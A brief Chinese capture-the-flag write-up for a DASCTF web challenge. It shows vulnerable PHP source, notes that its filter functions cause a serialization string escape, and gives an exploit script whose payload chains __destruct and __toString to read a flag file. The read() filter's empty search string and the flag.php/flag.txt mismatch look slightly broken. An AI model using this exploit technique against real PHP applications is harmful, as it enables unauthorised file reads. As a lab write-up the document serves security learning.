安恒月赛-四月赛web1……未详细介绍

DASCTF_WEB1

放毒:喝雪碧的鸡

干杯:

源码

<?php
show_source("index.php");
function write($data) {
    return str_replace(chr(0) . '*' . chr(0), '', $data);
}

function read($data) {
    return str_replace('', chr(0) . '*' . chr(0), $data);
}

class A{
    public $username;
    public $password;
    function __construct($a, $b){
        $this->username = $a;
        $this->password = $b;
    }
}

class B{
    public $b = 'gqy';
    function __destruct(){
        $c = 'a'.$this->b;
        echo $c;
    }
}

class C{
    public $c;
    function __toString(){
        //flag.txt
        echo file_get_contents($this->c);
        return 'nice';
    }
}

$a = new A($_GET['a'],$_GET['b']);
//省略了存储序列化数据的过程,下面是取出来并反序列化的操作

$b = unserialize(read(write(serialize($a))));

参考:https://www.cnblogs.com/magic-zero/p/11643916.html

分析

function write($data) {
    return str_replace(chr(0) . '*' . chr(0), '', $data);
}

function read($data) {
    return str_replace('', chr(0) . '*' . chr(0), $data);
}

这两个函数会因为序列化的严格规则，造成字符串逃逸。

exp

<?php
class A{
    public $username;
    public $password;
}

class B{
    public $b = 'gqy';
}

class C{
    public $c = "flag.php";
}
$c = new C();
$b = new B();
$b->b = $c;

$exp = 'AAAA";s:5:"h3zh1";'.serialize($b);
$aa = "\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0";

echo "a=".$aa."&b=".$exp;